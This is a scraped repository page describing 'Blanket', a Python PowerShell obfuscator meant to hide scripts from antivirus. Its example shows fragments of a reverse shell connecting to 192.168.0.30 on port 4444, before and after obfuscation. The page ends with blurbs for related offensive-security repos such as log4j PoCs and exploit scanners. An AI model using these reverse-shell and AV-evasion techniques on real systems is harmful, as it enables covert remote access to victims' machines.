If you are worried about being found perhaps try taking cover under a blanket. Pure Python PowerShell Obfuscator

Related tags

Security related resourcesBlanket
Overview

Blanket

▀█████████▄   ▄█          ▄████████ ███▄▄▄▄      ▄█   ▄█▄    ▄████████     ███     
  ███    ███ ███         ███    ███ ███▀▀▀██▄   ███ ▄███▀   ███    ███ ▀█████████▄ 
  ███    ███ ███         ███    ███ ███   ███   ███▐██▀     ███    █▀     ▀███▀▀██ 
 ▄███▄▄▄██▀  ███         ███    ███ ███   ███  ▄█████▀     ▄███▄▄▄         ███   ▀ 
▀▀███▀▀▀██▄  ███       ▀███████████ ███   ███ ▀▀█████▄    ▀▀███▀▀▀         ███     
  ███    ██▄ ███         ███    ███ ███   ███   ███▐██▄     ███    █▄      ███     
  ███    ███ ███▌    ▄   ███    ███ ███   ███   ███ ▀███▄   ███    ███     ███     
▄█████████▀  █████▄▄██   ███    █▀   ▀█   █▀    ███   ▀█▀   ██████████    ▄████▀   
             ▀                                  ▀

If you are worried about being found perhaps try taking cover under a blanket.

Pure Python PowerShell Obfuscator

Usage

git clone https://github.com/warren2i/Blanket

cd Blanket

usage: Blanket.py [-h] -i IP -p PORT [-o OUTFILE] [-s SCRIPT] [-v VARSIZE]

FROM THIS

alt text

	$writer.Flush();
	$read = $null;
	$res = ""
	while($stream.DataAvailable -or $read -eq $null) {
		$read = $stream.Read($buffer, 0, 1024)
	}
	$out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");

TO THIS

alt text

<# Rick  HOLY CRAP  MORTY RUN     they take off  running in complete and total fear as the monster chases them   #>
$qiWhuJGxwI = new-object $jIXFgQanbD$ARXnYkEGqw$wSZMLtSCNA$hWVEIzFKHR$lDnUhrDSGw$aRBYRkGFUw$kXBLnxbVkq('192.168.0.30', 4444);
<# Jerry  Well  now you can build baskets and watch Paul Newman movies on VHS and mentally scar the Boy Scouts every Christmas   #>
if($qiWhuJGxwI -eq $rAQVEYeUkX){exit 1}
<# Jessica  You re Morty  right   #>
$GMRilHjFFt = $qiWhuJGxwI.GetStream();
<# Announcer  The glarp zone is for flarping and unglarping only   #>
$wdosspwpUlDUCxjSMOa = new-object $jFOPXASzCc$SPJkhQzvSx$HBxMZKRsex$NQbpEvtWIi$WBpIsOyusc($GMRilHjFFt);
<# Rick  Morty  I had to    I had to do it  I had�   I had to�   I had to make a bomb  Morty  I had to create a bomb   #>
$mpExOgyAGZ = new-object $ccPCTjvCMR$QGNWUyjRyA$GZSdvCoHYt[] 1024;
<# Morty  Ohhhhh   Rick pushes over a giant capsule  with an alien fetus over  smashing some Gromflomites  to slow them down   #>
$CABnIxyBoA = new-object $GUxCXYklTR$jmgKZRfvsC$dbYEHnzBop$PCZxvNmpro$esduLAahPr$vVAAgyplvP$xNZyQeUbTR;
<# Principal Vagina  I done been notifying you  Have you not been getting the messages I ve been leaving with Morty s grandfather   #>

How Does Blanket Work?

randomvar(length)

Creates a random string of length (length), this is used to replace variables

addcomments()

Insert a comment on each line, comments are generated from text file defined with argument -c --comments

breakdatatype(string, rando)

Locates strings found by av and breaks into random multi line variables

Before Blanket
$pinfo = New-Object System.Diagnostics.ProcessStartInfo
After Blanket
$WjUHPtSUMs = New-Object $FxWBgCj$qzCeaqa$qjGBOBx$KRKWjyD$CRLlqAV$PspQekI$XkPguzs$FcQZxty$LXMGRypStartInfo
Owner
Ph0tonz
Full-Stack Developer
Ph0tonz
GitHub Repository
Fuzzercorn - Bring libfuzzer to Unicorn

Fuzzercorn libfuzzer bindings for Unicorn. API // The main entry point of the fu

lazymio 23 Nov 17, 2022
Script to calculate Active Directory Kerberos keys (AES256 and AES128) for an account, using its plaintext password

Script to calculate Active Directory Kerberos keys (AES256 and AES128) for an account, using its plaintext password

Matt Creel 27 Dec 20, 2022
A simple automatic tool for finding vulnerable log4j hosts

Log4Scan A simple automatic tool for finding vulnerable log4j hosts Installation pip3 install -r requirements.txt Usage usage: log4scan.py [-h] (-f FI

Federico Rapetti 20018955 6 Mar 10, 2022
An interactive python script that enables root access on the T-Mobile (Wingtech) TMOHS1, as well as providing several useful utilites to change the configuration of the device.

TMOHS1 Root Utility Description An interactive python script that enables root access on the T-Mobile (Wingtech) TMOHS1, as well as providing several

40 Dec 29, 2022
python driver for fingerprint machine (ZKTeco biometrics)

fpmachine python driver for fingerprint machine (ZKTeco biometrics) support until now 2 model supported and tested ZMM100_TFT and ZMM220_TFT install p

Samy Sultan 4 Oct 06, 2022
BETA: Layla - recon tool for bug bounty

WELCOME TO LAYLA Layla is a python script that automatically performs recon on a

Matheus Faria 68 Jan 04, 2023
Getting my gitlab commit history into github

🔰 ᵀᴱᴸᴱᴳᴿᴬᴹ ᴴᴬᶜᴷ ᴮᴼᵀ 🔰 The owner would not be responsible for any kind of bans due to the bot. • ⚡ INSTALLING ⚡ • • 🛠️ Lᴀɴɢᴜᴀɢᴇs Aɴᴅ Tᴏᴏʟs 🔰 • If

Santiago Chiesa 1 Dec 24, 2021
Phoenix Framework is an environment for writing, testing and using exploit code.

Phoenix-Framework Phoenix Framework is an environment for writing, testing and using exploit code. 🖼 Screenshots 🎪 Community PwnWiki Forums 🔑 Licen

Felix 42 Aug 09, 2022
Yesitsme - Simple OSINT script to find Instagram profiles by name and e-mail/phone

Simple OSINT script to find Instagram profiles by name and e-mail/phone

108 Jan 07, 2023
PoC for CVE-2021-26855 -Just a checker-

CVE-2021-26855 PoC for CVE-2021-26855 -Just a checker- Usage python3 CVE-2021-26855.py -u https://mail.example.com -c example.burpcollaborator.net # C

Abdullah AlZahrani 17 Dec 22, 2022
Bypass 4xx HTTP response status codes.

Forbidden Bypass 4xx HTTP response status codes. To see all the test cases, check the source code - follow the NOTE comments. Script uses multithreadi

Ivan Šincek 165 Dec 28, 2022
Mass scan for .git repository and .env file exposure

Mass .Git repository and .Env file Scan by Scarmandef Scanner to find .env file and .git repository exposure on multiple hosts Because of the response

8 Jun 23, 2022
A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability

log4j-shell-poc A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability. Recently there was a new vulnerability in log4j, a java loggin

koz 1.5k Jan 04, 2023
labsecurity is a tool that brings together python scripts made for ethical hacking, in a single tool, through a console interface

labsecurity labsecurity is a tool that brings together python scripts made for ethical hacking, in a single tool, through a console interface. Warning

Dylan Meca 16 Dec 08, 2022
Herramienta para descargar eventos de Sucuri WAF hacia disco.

Descarga los eventos de Sucuri Script para descargar los eventos del Sucuri Web Application Firewall (WAF) en el disco como archivos CSV. Requerimient

CSIRT-RD 2 Nov 29, 2021
VMware vCenter earlier v(7.0.2.00100) unauthorized arbitrary file read

vcenter_fileread_exploit VMware vCenter earlier v(7.0.2.00100) unauthorized arbitrary file read Usage python3 vCenter_fileread.py http(s)://ip Referen

Ashish Kunwar 4 Sep 23, 2022
Python APK Reverser & Patcher Tool

DTL-X An Advanced Python APK Reverser and Patcher Tool. --rmads1: target=AndroidManifest.xml,replace=com.google.android.gms.ad --rmads2: No Internet (

DedSecTL 10 Oct 31, 2022
Simple script to have LDAP authentication in Home Assistant Docker, using NGINX's ldap-auth container

Home Assistant LDAP Auth Simple script to have LDAP authentication in Home Assistant Docker, using NGINX's ldap-auth container. Usage Deploy NGINX's l

Erik 1 Sep 21, 2022
CVE-2021-44228 log4j 2.x rce漏洞检测工具

#1 使用说明 CVE-2021-44228 log4j 2.x rce漏洞检测工具,对目标链接发起get请求并利用dnslog探测是否有回显 $ python3 log4j-scan.py -h

CoCo ainrm- 4 Jan 13, 2022
An automated header extensive scanner for detecting log4j RCE CVE-2021-44228

log4j An automated header extensive scanner for detecting log4j RCE CVE-2021-44228 Usage $ python3 log4j.py -l urls.txt --dns-log REPLACE_THIS.dnslog.

2 Dec 16, 2021